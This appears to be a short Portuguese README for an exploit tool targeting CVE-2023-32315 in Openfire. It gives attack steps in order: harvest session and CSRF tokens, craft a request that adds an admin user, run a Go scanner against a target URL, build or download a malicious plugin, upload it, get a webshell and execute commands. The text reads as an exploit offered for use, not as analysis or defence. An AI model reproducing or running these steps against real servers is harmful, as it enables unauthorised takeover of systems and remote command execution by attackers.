
CVE-2023-32315(java7)
0x01 Obter o JSESSIONID e csrftoken retornados, construir pacote de solicitação para adicionar usuário (substituir JSESSIONID, csrftoken) img.png
cd CVE-2023-32315-Openfire-Bypass/scan_all
go mod tidy
go run main.go -u http://openfire.com:9090
0x02 Compilação e instalação do plugin
mvn clean package
Ou Baixar plugin dos releases
0x03 Enviar plugin img.png
0x04 Obter webshel img.png 0x05 Executar comando img.png